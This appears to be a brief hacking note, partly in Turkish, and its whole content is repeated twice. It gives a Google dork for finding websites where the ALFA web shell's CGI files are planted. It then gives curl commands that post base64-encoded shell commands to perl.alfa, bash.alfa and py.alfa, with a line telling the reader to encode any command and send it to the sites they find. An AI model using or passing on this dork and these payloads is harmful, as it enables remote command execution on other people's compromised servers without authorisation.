Google Dork: inurl:/alfacgiapi intext:alfa
# [ Vulnerable Files ] :
# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/bash.alfa
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/py.alfa
çalıştırmak istediğiniz komutu base64 encode yapıp bulduğunuz siteye post ediyorsunuz.
sonuç
# [ Vulnerable Files ] :
# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/bash.alfa
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/py.alfa
çalıştırmak istediğiniz komutu base64 encode yapıp bulduğunuz siteye post ediyorsunuz.
sonuç
